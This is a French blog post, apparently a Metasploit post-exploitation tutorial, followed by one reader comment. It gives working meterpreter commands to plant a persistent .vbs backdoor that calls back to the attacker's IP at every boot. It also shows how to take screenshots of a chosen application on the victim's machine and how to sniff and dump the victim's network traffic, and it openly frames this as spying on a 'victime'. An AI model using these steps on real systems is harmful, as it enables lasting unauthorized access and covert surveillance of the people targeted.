Metasploit – Post Exploitation – 1

Une fois que notre exploit est lancé, que nous avons le contrôle de la machine victime, nous passons dans la phase dite de  » Post Exploitation « . C’est en fait l’étape la plus importante, puisque maintenant nous allons fouiller, modifier, espionner la machine victime depuis l’intérieur !

Nous avons déjà fait le tour de getsystem qui vous permet de devenir root sur une machine ( ici ). Ainsi que de celles qui permettent de se débarrasser de programmes gênant comme un antivirus ..
Tout ceci fait déjà partit de la post exploitation, puisque notre exploit a marché et nous a ouvert un accès au meterpreter.

Backdoor

Comme nous avons réussi a obtenir un accès à la machine, il serait vraiment bien de le garder. Et donc pour cela on va placer une backdoor dans la machine. Metasploit permet de créer une backdoor et de l’envoyer sur la machine. Pour cela on va se placer dans le meterpreter et lancer le module persistance.

 

A vous maintenant de composer votre backdoor avec les différentes options possibles.
Pour la demo j’utilise :

run persistence -A -L <EmplacementBackdoor> -X -i 10 -p <PORT> -r <IP Attaquant>

 



Metasploit nous a crée un fichier .vbs qui est notre backdoor. Dans ce cas la elle est situé dans c:\.
Avec cette configuration, la backdoor se connecte automatiquement sur nous quand le système démarre.
Pour cela elle utilise le payload reverse_tcp, mais cela peut etre modifié grace a l’option -P.

Capture d’ecran

Très bon moyen si vous voulez prouver que votre victime traîne sur un site spécifique, qu’il utilise une application particulière ..Pour cela on peut utiliser la fontion basique de screenshots qui va nous montrer tout le bureau, ou alors on peut se greffer sur une application particulière grace a Espia.

On migre ensuite sur l’application désirée grâce a son PID ( migrate <pid> )

Et il ne reste qu’a exécuter la commande screengrab pour avoir une belle capture d’écran !

Capturer le traffic résau :

Si votre but est d’espionner votre victime vous pouvez vous concentrer sur ses actions sur le réseau et récupérer des fichiers de captures du trafic ! Encore une fois cela se passe dans une autre extension non chargée par défaut : sniffer.
Je commence donc par regarder les interfaces de capture disponibles sur la machine cible avec sniffer_interfaces.
Je lance ensuite le sniffer sur l’interface 1 avec sniffer_start 1.
Quand je pense avoir assez de donnés intéressantes je demande un dump de ces donnés :
 sniffer_dump <interface> <nom du fichier>
On peux après arrêter la capture avec sniffer_stop <interface>
Metasploit nous a généré un fichier PCAP, on peux donc l’ouvrir avec Wireshark ou Xplico !
Si on en croit Wireshark, pendant que nous écoutions le réseau, la victime a tenté un ping de sa passerelle.
Voyons un peu ce qu’il se passait chez la victime a ce moment la :
Voila qui confirme notre observation !
Voila pour cette première partie sur la Post Exploitation, rendez vous sur ce blog d’ici peu pour la suite !

Un commentaire on "Metasploit – Post Exploitation – 1"

  • bonjour,
    Une fois la persistence configurée, la victime peut redémarrer son ordinateur on sera reconnecté directement cependant j’ai une question:
    Si on décide de redémarrer kali, comment se reconnecter sur la session sans relancer le .exe situé sur le pc de la victime ?
    cordialement

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *